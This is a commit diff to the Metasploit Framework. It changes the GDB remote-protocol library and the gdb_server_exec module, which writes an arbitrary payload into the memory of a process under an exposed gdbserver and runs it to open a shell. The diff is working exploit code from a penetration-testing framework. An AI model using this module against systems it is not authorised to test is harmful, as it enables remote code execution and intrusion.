Remove automatic target, couldn't figure out generic payloads.

Author: jvennix-r7

lib/msf/core/exploit/gdb.rb

@@ -18,11 +18,10 @@ module Exploit::Remote::Gdb
   # Default list of supported GDB features to send the to the target
   GDB_FEATURES = 'qSupported:multiprocess+;qRelocInsn+;qvCont+;'
 
-  # Maps arch -> index of register in GDB that holds $PC
+  # Maps index of register in GDB that holds $PC to architecture
   PC_REGISTERS = {
-    ARCH_X86 => '08',
-    ARCH_X64 => '10',
-    ARCH_X86_64 => '10'
+    '08' => ARCH_X86,
+    '10' => ARCH_X86_64
   }
 
   # Send an ACK packet
@@ -32,7 +31,7 @@ def send_ack
   end
 
   # Reads an ACK packet from the wire
-  # @raise ['received bad ack'] if a bad ACK is received
+  # @raise [RuntimeError] if a bad ACK is received
   def read_ack
     unless sock.get_once == '+'
       raise 'received bad ack'
@@ -85,17 +84,6 @@ def checksum(str)
     "%02x" % str.bytes.inject(0) { |b, sum| (sum+b)%256 }
   end
 
-  # Gets the current instruction by stepping and parsing the PC register from response
-  # @return [String] containing the hex-encoded address stored in EIP
-  def get_pc
-    # on x64 it is the register under the key "10"
-    idx = pc_reg_index(payload.arch)
-    pc = step.split(';').map { |r| r =~ /#{idx}:([a-f0-9]*)/ and $1 }.compact.first
-    # convert to desired endian/ptr size for a given arch
-    addr = Rex::Arch.pack_addr(payload.arch, Integer(pc, 16))
-    Rex::Text.to_hex(addr, '')
-  end
-
   # Writes the buffer +buf+ to the address +addr+ in the remote process's memory
   # @param buf [String] the buffer to write
   # @param addr [String] the hex-encoded address to write to
@@ -105,6 +93,24 @@ def write(buf, addr)
     read_response
   end
 
+  # Steps execution and finds $PC pointer and architecture
+  # @return [Hash] with :arch and :pc keys containing architecture and PC pointer
+  def process_info
+    data = step
+    pc_data = data.split(';')[2].split(':')
+    my_arch = PC_REGISTERS[pc_data[0]]
+    pc = pc_data[1]
+
+    if my_arch.nil?
+      raise RuntimeError, "Could not detect a supported arch from response to step:\n#{pc_data}"
+    end
+
+    {
+      arch: my_arch,
+      pc: Rex::Text.to_hex(Rex::Arch.pack_addr(my_arch, Integer(pc, 16)), '')
+    }
+  end
+
   # Continues execution of the remote process
   # @param opts [Hash] the options hash
   # @option opts :read [Boolean] read the response
@@ -114,6 +120,13 @@ def continue(opts={})
   end
 
   # Executes one instruction on the remote process
+  #
+  # The results of running "step" will look like:
+  # x86: $T0505:00000000;04:a0f7ffbf;08:d2f0fdb7;thread:p2d39.2d39;core:0;#53
+  # x64: $T0506:0000000000000000;07:b0587f9fff7f0000;10:d3e29d03057f0000;thread:p8bf9.8bf9;core:0;#df
+  # The third comma-separated field will contain EIP, and the register index
+  # will let us deduce the remote architecture (through PC_REGISTERS lookup)
+  #
   # @return [String] a list of key/value pairs, including current PC
   def step
     send_cmd 'vCont;s'
@@ -129,13 +142,6 @@ def handshake(features=GDB_FEATURES)
     read_response # lots of flags, nothing interesting
   end
 
-  # @param my_arch [String, Array] the current system architecture
-  # @return [String] hex index of the register that contains $PC for the current arch
-  def pc_reg_index(my_arch)
-    if my_arch.is_a?(Array) then my_arch = my_arch[0] end
-    PC_REGISTERS[my_arch]
-  end
-
 end
 
 end

modules/exploits/multi/gdb/gdb_server_exec.rb

@@ -17,9 +17,12 @@ def initialize(info = {})
           This module attempts to execute an arbitrary payload on a gdbserver service.
       },
       'Author'        => [ 'joev' ],
-      'Targets'       => [ [ 'Automatic', {} ] ],
-      'Arch'          => [ ARCH_X86, ARCH_X64 ],
-      'Platform'      => %w(linux unix osx windows),
+      'Targets'       => [
+        [ 'x86 (32-bit)',    { 'Arch' => ARCH_X86 } ],
+        [ 'x86_64 (64-bit)', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+      'Platform'      => %w(linux),
       'DefaultTarget' => 0
     ))
   end
@@ -31,16 +34,20 @@ def exploit
     handshake
 
     print_status "Stepping program to find PC..."
-    pc = get_pc
+    gdb_pc, gdb_arch = process_info.values_at :pc, :arch
 
-    print_status "Writing payload at #{pc}..."
-    write(payload.encoded, pc)
+    unless arch.include? gdb_arch
+      fail_with('The payload architecture is incorrect.')
+    end
+
+    print_status "Writing payload at #{gdb_pc}..."
+    write(payload.encoded, gdb_pc)
 
     print_status "Executing the payload..."
     continue
 
     # gdb throws a SIGINT on the execve, so a second continue is necessary
-    continue(read: false)
+    continue(read: false) # don't wait on response, as the shell is now looping
 
     handler
     disconnect